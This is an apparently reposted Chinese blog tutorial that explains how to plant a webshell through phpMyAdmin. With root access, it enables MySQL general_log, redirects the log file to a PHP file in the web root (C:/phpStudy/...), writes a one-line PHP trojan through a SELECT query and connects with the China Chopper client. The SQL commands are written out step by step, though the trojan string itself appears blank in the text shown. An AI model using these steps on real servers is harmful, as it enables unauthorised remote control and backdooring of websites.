博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
通过phpMyAdmin拿webshell
阅读量:2259 次
发布时间:2019-05-09

本文共 517 字,大约阅读时间需要 1 分钟。

general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like 'general_log';

general log是关闭状态,执行SQL语句开启general log

set global general_log=on;

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/x.php';

创建的x.php里的内容

然后执行SQL查询语句

SELECT '
';

执行成功

看一下x.php里的内容

成功插入了一句话木马

用菜刀连接,看看是否能够解析的

 

连接成功

转载于:https://www.cnblogs.com/sch01ar/p/8380649.html

你可能感兴趣的文章
StringBuffer操作字符以及其常用的方法
查看>>
String类和StringBuffer类的区别
查看>>
抽象类和接口的区别
查看>>
Coding如何生成SSH公匙密匙?
查看>>
Vue环境搭建
查看>>
Flex弹性布局之flex-basis、flex-grow、flex-shrink分析
查看>>
常见的flex属性和其解释
查看>>
为什么js代码块有时候不起作用,需要放在body标签中
查看>>
css主流浏览器引擎前缀
查看>>
Git版本回退
查看>>
js中 break 和 continue 的区别
查看>>
Git常用命令
查看>>
Git常用命令
查看>>
Git查看版本改动—— git diff
查看>>
Git 撤销工作区中的改动
查看>>
Git 撤销文件删除
查看>>
Git如何在不提交当前分支的情况下切换到其它分支进行操作——git stash
查看>>
CSS之linear-gradiend ——实现条纹背景效果
查看>>
CSS之linear-gradiend ——实现网格背景效果
查看>>
git clone时出现error: RPC failed; curl 18 transfer closed with outstanding read data remaining
查看>>